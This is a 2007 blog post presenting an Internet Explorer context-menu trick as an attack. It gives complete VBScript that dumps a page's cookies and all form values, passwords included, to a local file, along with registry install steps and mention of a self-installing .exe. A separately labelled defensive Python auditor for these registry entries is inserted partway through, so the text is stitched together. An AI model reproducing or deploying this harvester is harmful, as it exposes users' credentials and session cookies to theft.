
Sunday, February 11, 2007

Attacks using external.menuArguments

For a better view of this article, see:
http://www.codeproject.com/useritems/externalmenuArgument.asp


New way to get all web page information


The idea: Internet Explorer has a small back door that lets you read all the information of a web page and change its content. The trick is in the registry, at the key


 


HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\


 


Under this key you can add a new item to the Internet Explorer context menu. For example, if you add this key


 


HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\~~~~~~Get All Page Info~~~~


You will see this view:

[Sample screenshot]


 


The second part of the trick is described at the following link


http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml/reference/properties/menuarguments.asp


 


The menuArguments property lets you write VBScript and JavaScript that runs on the client, and you need to know that menuArguments is part of the external object


http://msdn.microsoft.com/workshop/author/dhtml/reference/objects/external.asp


 


If you put all of that together, you can write a script that is called from the menu and does whatever you want with the page. Here is an example that reads all the cookie information, all the form information and all the elements in the forms, then saves it in a text file at C:\Information.txt


 







<script language=vbscript>
' Runs when the context-menu item is clicked.
' external.menuArguments is the window in which the menu item was invoked.
on error resume next
    set EventElement = external.menuArguments.document
    FilesFolder = "C:\MyHacks\GrappedFiles"
    set t=createobject ("SCRIPTING.FILESYSTEMOBJECT")
    ' CreateFolder does not create missing parent folders, so C:\MyHacks must already exist
    if not t.FolderExists(FilesFolder) then t.CreateFolder(FilesFolder)
    strFileName = FilesFolder & "\" & CleanString( EventElement.title & "___"  & date & "_" & Time ) & ".txt"
    ' 8 = ForAppending, true = create the file if it does not exist
    set l=t.OpenTextFile(strFileName,8,true)

    ' Page URL, title and cookies
    l.Write "/////////////////////////////// New Hacky ///////////////////////////////"  & vbCrLf
    l.Write "Url is = " & EventElement.url & vbCrLf
    l.Write "Page Title is = " & EventElement.title & vbCrLf
    l.Write  EventElement.cookie & vbCrLf  & vbCrLf  & vbCrLf

    ' Every form on the page, then every element of each form
    for i = 0 to EventElement.forms.length -1
        l.Write "_-_-_-_-_-_-_-_-_-_-_-_-_ Form infomration _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_" & vbCrLf
        l.Write " Form Name = " & EventElement.forms.item(i).Name & vbCrLf
        l.Write " Form Action = " & EventElement.forms.item(i).action & vbCrLf
        l.Write " Form Method = " & EventElement.forms.item(i).method & vbCrLf
        l.Write " Elements Count = " & EventElement.forms.item(i).elements.length & vbCrLf
        for ele = 0 to EventElement.forms.item(i).elements.length-1
            l.Write "------------------------- Element infomration ------------------------------" &  vbCrLf
            l.Write " Information for element number " & ele + 1 & vbCrLf
            l.Write " Elements Name = " & EventElement.forms.item(i).elements.item(ele).name & vbCrLf
            l.Write " Elements Value = " & EventElement.forms.item(i).elements.item(ele).value & vbCrLf
        next
    next
    l.Write vbCrLf & vbCrLf  & vbCrLf
    l.Write "Thanks to GOD to give me power to learn and teach."
    l.Write "Pray for me to learn more to be able to learn you" & vbCrLf
    l.Write "الحمد لله , الهم أرزقنى علما نافع و رزقا واسع و شفاء من كل داء"
    l.Write vbCrLf & vbCrLf  & vbCrLf
    l.close

' Replaces the characters that are not acceptable in a file name
Function CleanString(strTarget)
    strTarget = Replace(strTarget, """", "-")
    strTarget = Replace(strTarget, "'", "-")
    strTarget = Replace(strTarget, "\", "-")
    strTarget = Replace(strTarget, "/", "-")
    strTarget = Replace(strTarget, "|", "-")
    strTarget = Replace(strTarget, ">", "-")
    strTarget = Replace(strTarget, "<", "-")
    strTarget = Replace(strTarget, "*", "-")
    strTarget = Replace(strTarget, ":", "-")
    strTarget = Replace(strTarget, "?", "-")
    CleanString = strTarget
End Function

' Show the output file path in the page's own window
external.menuArguments.window.alert("All data are in the file " & vbcrlf & vbcrlf & strFileName)
</script>



 


As you can see, it is a simple VBScript file that depends 100% on external.menuArguments: it collects the data you want, then saves it to a TXT file.


 


In the upcoming part of this series I will give some tips on how to change the main document and do whatever you want with it, which helps a lot in some attacks, and I will explain how to protect web pages against these attacks. Before closing, here are the steps to install this script and test it:


 


Step 1: Copy the file HackingScript.htm to any folder and note the file path.

Step 2: Open "regedit" from Run and navigate to the key

 HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\

Step 3: Add a new key with the name "~~~~~~~~~Get All Page information~~~~~~~~"

Step 4: Change the key's default value to the path of HackingScript.htm from the first step.

Step 5: Open Internet Explorer, right-click and click on our new menu item.

Step 6: You will find the file C:\Information.txt, containing all the information of the page.
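
A defender-side check for the entry these steps create, as an added example that is not part of the original article: it parses a `reg export` dump of the MenuExt key and flags menu items whose default value points at a loose script file or at a location outside protected install directories. The sample export, the "Vendor Lookup" entry, the flag names and the PROTECTED list are constructed assumptions.

```python
import re

MENUEXT = r"hkey_current_user\software\microsoft\internet explorer\menuext" + "\\"
# Assumption: install roots that standard users cannot write to.
PROTECTED = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")
# Constructed sample in `reg export` format (not the .reg file attached to the article).
SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Vendor Lookup]
@="res://C:\\Program Files\\ExampleVendor\\lookup.dll/menu.htm"
"Contexts"=dword:00000010

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\~~~~~~Get All Page Info~~~~]
@="C:\\HackingScript.htm"
'''

def parse_menuext(reg_text):
    """Map each MenuExt menu item to its registry values ('' is the default value)."""
    items, current = {}, None
    for line in map(str.strip, reg_text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            key, current = line[1:-1], None
            if key.lower().startswith(MENUEXT) and "\\" not in key[len(MENUEXT):]:
                current = items.setdefault(key[len(MENUEXT):], {})
        elif current is not None:
            m = re.fullmatch(r'(@|"(?:[^"\\]|\\.)*")=(.*)', line)
            if m is None:
                continue
            name, data = m.group(1).strip('"@'), m.group(2)
            if data.startswith('"') and data.endswith('"'):
                data = re.sub(r"\\(.)", r"\1", data[1:-1])  # undo .reg string escaping
            elif data.startswith("dword:"):
                data = int(data[6:], 16)
            current[name] = data
    return items

def audit(reg_text):
    """Return (menu item, target, flags) per entry; the flags are heuristics."""
    report = []
    for name, values in parse_menuext(reg_text).items():
        target = str(values.get("", ""))
        low, flags = target.lower(), []
        is_res = low.startswith("res://")  # page embedded in a binary's resources
        path = low[6:].split("/", 1)[0] if is_res else low
        if not is_res:
            flags.append("loose-script-file")  # plain file, as in the article's install steps
        if not path.startswith(PROTECTED):
            flags.append("outside-protected-dirs")
        report.append((name, target, flags))
    return report
```

Files written by regedit or `reg export` are UTF-16, so read them with encoding="utf-16" before passing the text to audit(). Short 8.3 paths and environment variables are not resolved, so such targets need a manual look.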


 


I hope you like the article. Wait for the next part, which will cover how to use this technique in attacks such as "Page Simulation" and "Session Hijacking"; in the next part I will also explain how to protect your application against these attacks. Have a nice article ;)


 


Thanks for your time


 


 


Two files are attached to the article:

HackingScript.rar: contains the HTML file and the registry file, which contain everything in the article

HackingScript.exe: an SFX file which can be installed directly to C:\ and adds the menu to IE


 


There is one thing I want to mention: some people ask what is going to happen if I use this script, "it will get MY DATA". I just want to say that this script is able to modify things that can't be done without this trick. Try to use your imagination and guess what you can do with that. I write more in this topic, because it will be really harmful :) I will explain later how to protect your web site from such things.